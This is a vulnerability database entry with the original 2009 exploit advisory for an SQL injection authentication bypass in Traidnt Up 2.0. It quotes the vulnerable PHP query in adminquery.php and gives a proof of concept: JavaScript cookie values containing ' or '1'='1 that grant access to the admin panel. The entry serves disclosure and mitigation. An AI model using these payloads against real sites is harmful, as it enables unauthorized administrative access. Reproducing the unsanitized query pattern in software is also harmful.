Traidnt Up version 2.0 (Auth Bypass / Cookie) SQL Injection Vulnerability

vendor:

Traidnt Up

by:

Qabandi

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Traidnt Up

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Traidnt Up version 2.0 (Auth Bypass / Cookie) SQL Injection Vulnerability

A vulnerability exists in Traidnt Up version 2.0, which allows an attacker to bypass authentication and gain access to the application. This is due to the application not properly filtering user input in the 'adminquery.php' file. An attacker can exploit this vulnerability by setting the 'trupuser' and 'truppassword' cookies to malicious values such as 'admin' or '1'='1'. This will cause the application to return a true value, allowing the attacker to bypass authentication and gain access to the application.

Mitigation:

Ensure that user input is properly filtered and validated before being used in SQL queries.

Source

Exploit-DB raw data:

                  ||          ||   | ||
           o_,_7 _||  . _o_7 _|| q_|_||  o_w_,
          ( :   /    (_)    /           (   .  


=By: 	Qabandi
=Email:	iqa[a]hotmail.fr

	From Kuwait PEACE
                      
=Vuln:		Traidnt Up version 2.0 (Auth Bypass / Cookie) SQL Injection Vulnerability
=INFO:		http://traidnt.net/vb/showthread.php?t=943260
=BUY:  		----
=DORK:		----


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-SQL-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-----------------Vulnerable-code:--adminquery.php------------------
if(isset($_COOKIE[trupuser])){

      $adminuser =  strip_tags($_COOKIE[trupuser]);<---not filtered properly
      $adminpassword = strip_tags($_COOKIE[truppassword]);

 	  $getadmin = $db->query("SELECT * FROM `admin` WHERE `admin`.`admin_user` = '$adminuser' AND `admin`.`admin_password` = '$adminpassword'  LIMIT 0 , 1 ");
   	  $issetadmin = $db->resultcount($getadmin);

   	  if($issetadmin == 1){ <---- Checks if SQL statement is true then give the OK.
-------------------------------------------------------------------
=-=--=-==-=-=-=-=-=-=PoC=-=-=-=----=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==
Condition!: Magic_quotes_gpc == OFF!

APPLY THESE COOKIES:
Javascript:document.cookie = "trupuser=admin' or '1'='1;"
Javascript:document.cookie = "truppassword=Qabandi' or '1'='1;"

Go To:
./uploadcp/index.php

Enjoy Q_Q

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-==-=-=-==-COOOOKIEEEE!!!<3<3<3<3<3=---=-=-=-=-=--=-=-=-=-=-
-=-=-=-=-=-=-=Qabandi=-=-=Was-=-=-=--=-===-=HERE-=-=-=-=--=-=-=-==
=-=-=-=-==-=-=-=-=-=-No----More---Private=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Salamz: Killer Hack, Mr.Mn7os, All muslim hackers.

# milw0rm.com [2009-05-29]